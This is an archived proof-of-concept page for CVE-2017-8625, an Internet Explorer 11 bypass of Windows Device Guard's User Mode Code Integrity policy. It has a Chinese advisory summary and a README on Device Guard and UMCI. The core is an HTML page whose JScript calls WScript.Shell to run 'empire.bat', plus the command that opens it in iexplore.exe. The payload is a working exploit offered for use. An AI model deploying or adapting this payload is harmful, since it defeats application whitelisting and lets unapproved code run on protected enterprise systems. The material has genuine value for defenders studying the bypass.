CVE-2017-8625 PoC — Microsoft Windows Internet Explorer 安全漏洞

Source

https://github.com/homjxi0e/CVE-2017-8625_Bypass_UMCI

Associated Vulnerability

Title:Microsoft Windows Internet Explorer 安全漏洞 (CVE-2017-8625)
Description:Microsoft Windows 10和Windows Server 2016都是美国微软（Microsoft）公司的产品。前者是一套供个人电脑使用的操作系统，后者是一套服务器操作系统。Internet Explorer(IE)是一款Windows操作系统附带的Web浏览器。 Microsoft Windows中的IE 11中存在安全功能绕过漏洞，该漏洞源于程序没有验证UMCI策略。攻击者可利用该漏洞绕过Device Guard User Mode Code Integrity (UCMI)策略。以下版

Description

Bypass Feature UMCI in Internet Explorer

Readme

# what is ! Windows Defender Device Guard !
------------------------------------------------
Windows Defender Device Guard is a combination of enterprise-related hardware and software security features that, when configured together, will lock a device down so that it can only run trusted applications that you define in your code integrity policies. If the app isn’t trusted it can’t run, period. With hardware that meets basic requirements, it also means that even if an attacker manages to get control of the Windows kernel, he or she will be much less likely to be able to run malicious executable code. With appropriate hardware, Windows Defender Device Guard can use the new virtualization-based security in Windows 10 (available in Enterprise and Education desktop SKUs and in all Server SKUs) to isolate the Code Integrity service from the Microsoft Windows kernel itself. In this case, the Code Integrity service runs alongside the kernel in a Windows hypervisor-protected container.
This guide explores the individual features in Windows Defender Device Guard as well as how to plan for, configure, and deploy them. It includes:


##
what is UMCI
----------------------------
 UMCI prevents unapproved binaries from executing, restricts the Windows Scripting Host, and places PowerShell in Constrained Language mode. This makes obtaining code execution on a system fairly challenging. This post is going
 
======================================================================||>

bypass UMCI In Enternet Explorer by Jscript ! 
---


####
Let's go a code bypass show

======================================================================||>

```
<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>
```



======================================================================||>

```
PS:>  C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"
```


## Modify Code Jscript ! 
![screenshot from 2017-08-25 11-55-12](https://user-images.githubusercontent.com/25440152/29715018-7d585292-8973-11e7-8126-f2e946dbb52f.png)
======================================================================||>


##### Next Run bypass 
![screenshot from 2017-08-25 11-56-01](https://user-images.githubusercontent.com/25440152/29715057-a762c5c2-8973-11e7-84b7-ca7a68b96cf8.png)
---
======================================================================||>
======================================================================||>


# Author explanation 
[@Matt Homjxi0e](https://twitter.com/GihadAlkmaty)
-----
# Author Bypass
[@enigma0x3](https://twitter.com/enigma0x3)
-----

File Snapshot


 [4.0K]  /data/pocs/953baf7091cd15a5a6f0bf4f456ca32818e66859
├── [ 150]  Bypass.html
└── [2.7K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!